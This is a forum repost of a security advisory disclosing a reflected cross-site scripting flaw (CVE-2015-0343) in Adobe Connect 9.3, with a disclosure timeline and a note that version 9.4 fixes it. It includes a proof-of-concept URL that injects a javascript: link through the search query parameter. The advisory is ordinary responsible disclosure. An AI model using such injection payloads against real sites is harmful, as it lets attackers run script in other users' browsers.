Aerosol Posted June 13, 2015 Report Posted June 13, 2015 Advisory: Adobe Connect Reflected XSSAuthor: Stas Volfus (Bugsec Information Security LTD)Vendor URL: http://www.adobe.com/ Status: Vendor Notified==========================Vulnerability Description==========================Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting).The attack allows execution of arbitrary JavaScript in the context of the user’s browser.CVE id: CVE-2015-0343 assigned for this issue.========================== PoC==========================The following URL demonstrates the vulnerability:https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS Link</a>==========================Disclosure Timeline==========================04-NOV-2014 - Vendor notified01-DEC-2014 - CVE assigned27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4.==========================References==========================http://www.adobe.com/il_en/products/adobeconnect.htmlhttps://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.htmlSource Quote